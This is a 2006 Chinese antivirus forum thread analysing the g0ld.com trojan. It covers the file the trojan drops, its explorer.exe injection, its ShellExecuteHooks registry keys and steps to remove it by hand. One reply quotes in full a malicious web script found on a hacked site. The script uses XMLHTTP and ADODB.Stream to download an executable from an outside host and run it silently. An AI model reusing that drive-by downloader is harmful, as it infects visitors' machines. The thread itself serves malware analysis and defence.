瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 关于g0ld.com
baohe - 2006-8-24 10:58:00
据说是来自某网站的木马。拿到样本,看了一下。
其MD5值为33119870f5b8c7f823c8f6362555c756
瑞星18.41.22不报毒。升级到18.41.30——仍不报。

(一)感染系统后的表现:
g0ld.com运行后,在C:\Program Files\Common Files\Microsoft Shared\MSInfo目录下释放InfoMz.IME。
InfoMz.IME注入explorer.exe进程。

g0ld.com添加的注册表项:

1、在HKEY_CLASSES_ROOT\CLSID\分支添加:{F084FD46-EB63-4CC0-B814-99C16EE76BD1}
在HKEY_CLASSES_ROOT\CLSID\{F084FD46-EB63-4CC0-B814-99C16EE76BD1}\
添加:InProcServer32
InProcServer32的默认值为:@="C:\\Program Files\\Common Files\\Microsoft Shared\\MSINFO\\InfoMz.Ime"
"ThreadingModel"="Apartment"
2、在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks分支添加:
"{F084FD46-EB63-4CC0-B814-99C16EE76BD1}"=""
(二)查杀流程:
1、打开IceSword,找到进程explorer.exe,右击explorer.exe,点击“模块信息”,强制卸除插入explorer.exe进程的nfoMz.IME。
2、删除C:\Program Files\Common Files\Microsoft Shared\MSInfo\InfoMz.IME。
3、清理注册表:
打开注册表编辑器。
展开:HKEY_CLASSES_ROOT\CLSID\
删除:{F084FD46-EB63-4CC0-B814-99C16EE76BD1}
展开:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
删除:"{F084FD46-EB63-4CC0-B814-99C16EE76BD1}"=""
炫Oo逍遥oO - 2006-8-24 11:20:00
学习了`
炫Oo逍遥oO - 2006-8-24 11:21:00
顺便问下猫叔  你是用什么东西看见那病毒改的注册表哪些地方的`
breach - 2006-8-24 11:26:00
引用:
【炫Oo逍遥oO的贴子】顺便问下猫叔  你是用什么东西看见那病毒改的注册表哪些地方的`
………………



用SSM+Tiny完全可以看到,不知道猫叔是否跟俺一样。呵呵
炫Oo逍遥oO - 2006-8-24 11:37:00
SSM那只是个提示啊? 并没显示出来完整路径 我要那种完整的`
westbeck - 2006-8-24 11:37:00
学习了...
kzkjx - 2006-8-24 11:46:00
"打开IceSword"
这个在哪?
炫Oo逍遥oO - 2006-8-24 11:57:00
自己去找` 在这个论坛里搜索一下就能出来`
闪电风暴 - 2006-8-24 12:03:00
学习了
闪电风暴 - 2006-8-24 12:03:00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks


又来了一个玩这把戏的木马
刀刀笨贼 - 2006-8-24 12:13:00
我在h**p://www.z213.com/z213/就发现了这个,不过这网站几天前被黑过,管理员将被改动的公告区修复了,但是我22号晚上看时,网页尾部还是有:h**p://www.23597.com/pc/css.js
内容是:
document.writeln("<script language=\"VBScript\">");
document.writeln("    on error resume next");
document.writeln("dl = \"http:\/\/www.23597.com\/pc\/ms.exe\"");
document.writeln("    Set df = document.createElement(\"object\")");
document.writeln("    df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\"");
document.writeln("    str=\"Microsoft.XMLHTTP\"");
document.writeln("    Set x = df.CreateObject(str,\"\")");
document.writeln("    a1=\"Ado\"");
document.writeln("    a2=\"db.\"");
document.writeln("    a3=\"Str\"");
document.writeln("    a4=\"eam\"");
document.writeln("    str1=a1&a2&a3&a4");
document.writeln("    str5=str1");
document.writeln("    set S = df.createobject(str5,\"\")");
document.writeln("    S.type = 1");
document.writeln("    str6=\"GET\"");
document.writeln("    x.Open str6, dl, False");
document.writeln("    x.Send");
document.writeln("    fname1=\"g0ld.com\"");
document.writeln("    set F = df.createobject(\"Scripting.FileSystemObject\",\"\")");
document.writeln("    set tmp = F.GetSpecialFolder(2) ");
document.writeln("    fname1= F.BuildPath(tmp,fname1)");
document.writeln("    S.open");
document.writeln("    S.write x.responseBody");
document.writeln("    S.savetofile fname1,2");
document.writeln("    S.close");
document.writeln("    set Q = df.createobject(\"Shell.Application\",\"\")");
document.writeln("    Q.ShellExecute fname1,\"\",\"\",\"open\",0");
document.writeln("    <\/script>")
不知道是管理员疏忽和还是这个网站本来就是挂着的.....
dady欢欢 - 2006-8-24 12:14:00
呵呵,猫叔的文章就是好看啊!!1
刀刀笨贼 - 2006-8-24 12:23:00
又去看了一下,居然还在
710207 - 2006-8-24 12:48:00
学习
breach - 2006-8-24 13:04:00
引用:
【kzkjx的贴子】"打开IceSword"
这个在哪?
………………


看下图:


附件: 7317492006824125606.bmp
deadmanzj - 2006-8-24 13:07:00
学习到,收。。收。。。收
breach - 2006-8-24 13:07:00
引用:
【炫Oo逍遥oO的贴子】SSM那只是个提示啊? 并没显示出来完整路径 我要那种完整的`
………………


看下图


附件: 7317492006824125938.bmp
无限001 - 2006-8-24 13:23:00
支持一下,学习!
管不住的风 - 2006-8-24 14:01:00
学习了,但系为什么不报这个病毒呢?
【火影】我爱罗 - 2006-8-24 14:28:00
BOAHE斑竹用的什么软件啊,那么强!!!~~
baohe - 2006-8-24 16:08:00
【回复“【火影】我爱罗”的帖子】
我手头那点儿东西,常在社区混的都知道:SSM、TINY、瑞星或卡巴斯基。其它的小零碎还有:IceSword、autoruns、SREng、HijackThis。这些,不是同时都用哦!根据具体问题选择。
炫Oo逍遥oO - 2006-8-24 16:32:00
TINY 能给个详细介绍使用方法的帖吗?``谢谢了
闪电风暴 - 2006-8-24 16:37:00
TINY是英文的
baohe - 2006-8-24 16:49:00
引用:
【炫Oo逍遥oO的贴子】TINY 能给个详细介绍使用方法的帖吗?``谢谢了
………………

我不主张大家都去用Tiny。
原因有:
1、英文界面。并非所有人的英文都过关。
2、设置比较复杂。如果你不了解其设计思想,最好别用。
3、设置灵活。使用者要花时间熟悉。否则,你很可能“作茧自缚”。死,都不知道怎么死的。
4、Tiny是用出来的,不是听张三、李四讲讲,就能“游刃有余”的。

其实,SSM相对容易上手。设置、使用也比TINY容易。而且,SSM支持简体中文。
breach - 2006-8-24 17:01:00
引用:
【baohe的贴子】
我不主张大家都去用Tiny。
原因有:
1、英文界面。并非所有人的英文都过关。
2、设置比较复杂。如果你不了解其设计思想,最好别用。
3、设置灵活。使用者要花时间熟悉。否则,你很可能“作茧自缚”。死,都不知道怎么死的。
4、Tiny是用出来的,不是听张三、李四讲讲,就能“游刃有余”的。

其实,SSM相对容易上手。设置、使用也比TINY容易。而且,SSM支持简体中文。
………………



说的很有道理,不过我觉得就因为它很NB,我们学起来才有激情,玩得才过瘾。我就天天都在玩它,并且在baohe斑竹的指导下,我有了不少的进步。呵呵。在此再谢谢baohe斑竹。
和平爱好者 - 2006-8-24 17:49:00
引用:
【炫Oo逍遥oO的贴子】SSM那只是个提示啊? 并没显示出来完整路径 我要那种完整的`
………………

KIS6.0的主动防御保护的注册表监控似乎可以。
偶系Jay吖 - 2006-8-24 19:29:00
建议建个反病毒QQ群
炫Oo逍遥oO - 2006-8-24 19:30:00
TINY``在哪下?  我英语虽然不好 但偶姐姐是学英语的``6级过了``应该能帮我吧``
炫Oo逍遥oO - 2006-8-24 19:31:00
【回复“偶系Jay吖”的帖子】有了`
炫Oo逍遥oO - 2006-8-24 19:32:00
引用:
【breach的贴子】

看下图

………………

谢谢了 收到`
12
查看完整版本: 关于g0ld.com
© 2000 - 2026 Rising Corp. Ltd.